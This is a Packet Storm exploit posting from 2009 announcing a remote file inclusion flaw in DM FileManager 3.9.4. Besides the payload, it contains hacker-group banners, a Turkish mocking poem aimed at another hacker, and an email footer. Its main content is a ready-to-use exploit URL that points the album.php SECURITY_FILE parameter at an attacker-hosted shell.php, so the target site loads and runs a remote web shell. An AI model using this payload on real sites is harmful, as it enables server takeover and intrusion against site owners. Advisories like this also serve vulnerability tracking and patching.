DM FileManager 3.9.4 Remote File Inclusion

2009-06-29T00:00:00
ID PACKETSTORM:78743
Type packetstorm
Reporter Septemb0x
Modified 2009-06-29T00:00:00

Description

                                        
                                            `  
#############################################################################################  
[+] DM FileManager 3.9.4 Remote File Include Vulnerability  
[+] Author : Septemb0x  
[+] www.Cyber-Warrior.Org - Information Technology's World  
[+] Greetz : BARCOD3 And All Friends...  
[+] Dork : Yok Dork Mork :D  
[+] Download Script : http://uploaded.to/file/3z84ie  
[+] Product Site : http://www.dutchmonkey.com  
#############################################################################################  
[+] EXPLOIT;> [+] http://[sitename]/[path]/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php  
#############################################################################################  
< ---- Note ---- >  
  
H....R;  
Sen çok üstün zekaya sahip birisin,  
emin olbilirsin, :D  
Sql injection ile domain hackleyebilen tek lamersin, :D  
ASP'de Rfi Bulmakta Birebirsin,  
Ama Gördüðüm En hýyar Lamersin :D  
Bu Kafiyelerde Bi Tarafýna Girsin ;)  
Lol H....R :D  
  
< ---- Note Finished ---- >  
  
_________________________________________________________________  
Windows Live tüm arkadaþlarýnýzla tek bir yerden iletiþim kurmanýza yardýmcý olur.  
http://www.microsoft.com/turkiye/windows/windowslive/products/social-network-connector.aspx`